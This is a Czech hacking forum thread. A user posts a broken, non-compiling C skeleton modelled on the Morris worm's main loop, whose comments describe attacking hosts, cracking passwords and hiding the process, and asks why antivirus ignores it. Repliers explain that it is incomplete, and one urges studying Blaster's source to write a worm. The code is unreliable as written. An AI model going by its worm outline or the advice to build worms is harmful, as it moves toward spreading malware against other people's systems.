Proč je tento kód škodlivý a jak?

HackForum

Proč je tento kód škodlivý a jak?#
Proč je tento kód škodlivý? Co přesně má za úkol? A když ho uložím do .bat or .cmd, a dám ho testovat AV, proč ho sakra AV označuje za bezpečný??

666 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include




long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

int argc;

char *argv[];



{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) { parent = atoi (argv[++n]); n++;

}

else { /* check for 1l.c in argument list */ if (!strncmp(argv([n], "1l.c", 4)) okay = 1; /* load an object file into memory */ load_object (argv[n]; /* clean up by unlinking file */ if (parent) unlink (argv[n]); /* and removing object file name */ strcpy (argv[n++], "");

} }

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}



int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (;;) {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork()) /* parent exits, new worm continues */ exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120); /* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) { reset_hosts(); current_time = time(0); } /* quit if pleasequit is set, and nextw10 */

if (pleasequit && nextw 10) exit (0);

}

}
(odpovědět)
<.Chakvet@dze7 | 78.102.39.*23.9.2012 11:22
re: Proč je tento kód škodlivý a jak?#
Můžeš mi, prosím, vysvětlit, proc to ukládáš jako .bat, .cmd? Kód jsem nezkoumal, ale pokud má být nějak závadný, tak jej zřejmě AV najdou až ve zkompilované podobě. Zdroják rozhodně nebezpečný není :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP23.9.2012 19:07
re: Proč je tento kód škodlivý a jak?#
To je jediny argument, co mam :)) [link]
(odpovědět)
<.Chakvet@dze7 | 78.102.39.*23.9.2012 19:49
re: Proč je tento kód škodlivý a jak?#
Tak za prvé to neni ani worm ani vírus, potom tam chýbajú hlavičky a ďalej ako písal cCuminn prečo bat a cmd keď to je C?

A tie funkcie čo tam voláš sa v zdrojáku aj tak nenachádzajú. Takže je to len strata času.

Ten čo spravil to video ani sám nevedel čo robí :) keď už chceš robiť červa tak si stiahni zdroják blastera a z toho sa uč a nie od dákeho nooba z youtubu.



----------
We were born to change the world...
(odpovědět)
nitrexx | E-mail27.9.2012 23:43

Zpět
 
 
 

 
BBCode